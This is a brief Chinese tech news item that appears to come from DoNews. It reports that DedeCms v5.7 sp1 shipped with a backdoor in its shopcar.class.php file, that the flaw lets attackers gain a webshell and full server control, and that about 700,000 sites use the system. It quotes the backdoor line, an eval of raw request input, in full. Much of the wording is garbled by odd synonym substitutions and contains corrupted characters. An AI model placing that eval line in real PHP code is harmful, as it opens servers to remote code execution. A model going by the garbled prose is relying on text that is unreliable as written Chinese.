DoNews 3月22日動靜 據(jù)動靜人士對DoNews透露,PHP開源網(wǎng)站打點系統(tǒng)織夢CMS(DedeCms)v5.7 sp1版本被植入后門,黑客可經(jīng)由過程此后門直接獲得網(wǎng)站的節(jié)制權(quán)限,獲取存儲在處事器尚?罾υ?件和數(shù)據(jù)庫。
據(jù)悉,織夢CMS(Dedecms)v5.7 sp1版本的中的shopcar。class。php文件被植入一句后門代碼“@eval(file_get_contents(‘php://input’));”。經(jīng)由過程操作該后門,黑客只需機關(guān)簡單的數(shù)據(jù)包提交各處事器,就能獲取到該網(wǎng)站的WebShell,經(jīng)由過程對處事器進一步滲入抨擊襲擊,進而獲取處事器的最高權(quán)限。
織夢CMS裂痕示意圖
另據(jù)CMS官方數(shù)據(jù)顯示,今朝約有70萬網(wǎng)站使用該系統(tǒng)搭建,涉及企業(yè)、政府機關(guān)、媒體機構(gòu)、行業(yè)及小我網(wǎng)站等。(完)
網(wǎng)友點評
精彩導(dǎo)讀
科技快報
品牌展示